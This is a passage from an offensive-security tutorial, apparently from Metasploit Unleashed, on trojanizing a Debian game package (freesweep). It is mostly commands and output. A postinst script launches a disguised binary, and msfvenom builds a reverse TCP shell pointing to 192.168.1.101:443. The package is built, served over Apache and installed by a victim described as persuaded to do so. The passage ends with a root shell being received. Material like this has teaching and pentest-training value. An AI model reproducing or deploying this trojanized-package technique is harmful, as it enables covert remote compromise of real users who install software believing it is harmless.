create a file named postinst that contains the following: root@kali:/tmp/evil/work/DEBIAN# cat postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & Now we’ll create our malicious payload. 
We’ll be creating a reverse shell to connect back to us named ‘freesweep_scores’. root@kali:~# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores Found 10 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 98 (iteration=0) x86/shikata_ga_nai chosen with final size 98 Payload size: 98 bytes Saved as: /tmp/evil/work/usr/games/freesweep_scores We’ll now make our post-installation script executable and build our new package. The built file will be named work.deb so we will want to change that to freesweep.deb and copy the package to our webroot directory. root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'. root@kali:/tmp/evil# mv work.deb freesweep.deb root@kali:/tmp/evil# cp freesweep.deb /var/www/ If it is not already running, we’ll need to start the Apache web server. root@kali:/tmp/evil# service apache2 start We will need to set up the Metasploit multi/handler to receive the incoming connection. root@kali:~# msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y" PAYLOAD => linux/x86/shell/reverse_tcp LHOST => 192.168.1.101 LPORT => 443 [*] Started reverse handler on 192.168.1.101:443 [*] Starting the payload handler... On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game. ubuntu@ubuntu:~$ wget [Hidden Content] ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb As the victim installs and plays our game, we have received a shell! 
[*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129) ifconfig eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6 inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:49 errors:0 dropped:0 overruns:0 frame:0 TX packets:51 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB) Interrupt:17 Base address:0x1400 ...snip... hostname ubuntu id uid=0(root) gid=0(root) groups=0(root)